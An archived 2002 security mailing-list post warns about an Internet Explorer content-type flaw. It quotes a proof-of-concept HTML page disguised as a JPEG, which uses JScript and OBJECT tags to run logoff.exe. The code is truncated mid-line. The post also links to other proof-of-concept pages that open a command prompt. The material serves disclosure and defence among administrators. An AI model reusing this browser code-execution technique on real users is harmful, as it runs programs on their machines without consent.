OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: NoCoNFLiC (noconcastleblack.darkflame.net)
Date: Fri Mar 15 2002 - 17:49:31 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    [magnusbodin.org] Tue, Mar 12, 2002 at 11:32:20AM +0100 wrote:
    >
    > The latest MSIE-hole is now spreading.
    >
    > THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
    > Content-Type if it "thinks" it knows better, then the code is executed.
    > This in combination with the malicious code that is possible to run, then
    > an "innocent.jpg" with the following content will log off an XP-user.
    >
    > --%< cut here-----
    > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    > <HTML>
    > <HEAD>
    > <TITLE>IE6 security...</TITLE>
    >
    > <META http-equiv=Content-Type content="text/html; charset=windows-1252">
    > <SCRIPT language=JScript>
    >
    > var programName=new Array(
    > 'c:/windows/system32/logoff.exe',
    > 'c:/winxp/system32/logoff.exe',
    > 'c:/winnt/system32/logoff.exe'
    > );
    >
    > function Init(){
    > var oPopup=window.createPopup();
    > var oPopBody=oPopup.document.body;
    > var n,html='';
    > for(n=0;n<programName.length;n++)
    > html+="<OBJECT NAME='X'
    > CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
    > oPopBody.innerHTML=html;
    > oPopup.show(290, 390, 200, 200, document.body);
    > }
    >
    > </SCRIPT>
    > </head>
    > <BODY onload="Init()">
    > You should feel lucky if you dont have XP right now.
    > </BODY>
    > </HTML>
    > --%< cut here-----
    >
    >
    > --
    > magnus MICROS~1 BOB was written in Lisp.
    > http://x42.com/

       Just passing this along, as some may not be on the sec-basics list.

    -----Original Message-----
    From: Sprissler, Noah [mailto:NSPRISSLERPARTNERS.ORG]
    Sent: March 12, 2002 10:31
    To: security-basicssecurity-focus.com
    Subject: RE: scary site

    That's interesting. I have disabled active scripting as most have suggested
    and the http://www.liquidwd.freeserve.co.uk/ link stops bringing up a DOS
    prompt. However, if I goto this link from Greymagic
    http://security.greymagic.com/adv/gm001-ie/simplebind.html their
    implementation of this works fine no matter what settings I disable. Win2k
    with all patches, IE6 with all patches.

    -Noah

    -----Original Message----- 

    -- 

    - nocon

    ======================================

    nocondarkflame.net
http://nocon.darkflame.net

    ======================================